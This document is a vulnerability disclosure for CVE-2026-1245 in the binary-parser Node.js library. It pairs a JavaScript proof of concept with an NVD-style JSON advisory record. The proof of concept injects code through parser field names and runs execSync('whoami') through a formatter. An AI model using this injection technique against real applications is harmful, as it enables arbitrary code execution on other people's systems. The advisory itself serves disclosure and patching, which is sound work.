CVE-2026-1245

const { Parser } = require('binary-parser'); // Malicious field name that injects code const maliciousParser = new Parser() .uint8('length') .string('name', { length: 'length', encoding: 'utf8', // Inject code via field name using template literal formatter: (val) => `${require('child_process').execSync('whoami')}` }); // Another PoC - direct code injection in field name const exploitParser = new Parser() .uint8('a') .string('${console.log("CODE INJECTED")}', { length: 1 }); // Simulating parsing untrusted data try { const buffer = Buffer.from([5, 0x41]); const result = exploitParser.parse(buffer); console.log('Parsed result:', result); } catch (e) { console.log('Error (may still execute injected code):', e.message); } // Example of detecting vulnerable version console.log('binary-parser version check:', require('binary-parser/package.json').version);

{"cve": {"id": "CVE-2026-1245", "sourceIdentifier": "[email protected]", "published": "2026-01-20T19:15:50.573", "lastModified": "2026-02-03T21:41:59.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. The library directly interpolates these values into dynamically generated code without sanitization, enabling attackers to execute arbitrary code in the context of the Node.js process."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de código en la librería binary-parser anterior a la versión 2.3.0 permite la ejecución arbitraria de código JavaScript cuando se utilizan valores no confiables en nombres de campos del analizador o parámetros de codificación. La librería interpola directamente estos valores en código generado dinámicamente sin sanitización, permitiendo a los atacantes ejecutar código arbitrario en el contexto del proceso de Node.js."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keichi:binary-parser:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "7FCCACB7-F3FF-4E03-91E5-3D0E0D2F69A2"}]}]}], "references": [{"url": "https://github.com/keichi/binary-parser", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/keichi/binary-parser/pull/283", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.cert.org/vuls/id/102648", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.npmjs.com/package/binary-parser", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.kb.cert.org/vuls/id/102648", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}]}}